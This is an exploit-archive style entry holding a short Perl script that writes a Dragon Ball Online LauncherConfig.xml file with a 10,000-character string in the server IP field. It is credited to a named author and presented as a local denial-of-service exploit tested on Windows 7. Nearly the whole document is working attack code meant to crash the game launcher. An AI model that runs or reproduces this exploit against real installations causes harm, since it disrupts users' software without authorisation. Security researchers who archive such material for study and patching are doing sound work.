DBO local denial of service exploit that leverages LauncherConfig.xml.
d0073895c37bd6cc597e7208a51765b7505163f32344aa194c880ed68dc0ab0a
# Exploit Title: DBO local DOS Exploit (LauncherConfig.xml)
# Date: 12/09/2011
# Author: AlpHaNiX
# Contact: Alpha_[at]_hacker_[dot]_bz
# Version: all
# Tested on: win7
# File Path: []:\Netmarble\DragonBall Online
$junk = "A" x 10000;
open(file,">>LauncherConfig.xml");
print file "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n".
"<CONFIG>\n".
"<INIT_CONNECTION_SVR_IP>".$junk."</INIT_CONNECTION_SVR_IP>\n".
"<INIT_CONNECTION_SVR_PATH></INIT_CONNECTION_SVR_PATH>\n".
"<INIT_CONNECTION_SVR_FILENAME></INIT_CONNECTION_SVR_FILENAME>\n".
"</CONFIG>";
close(file);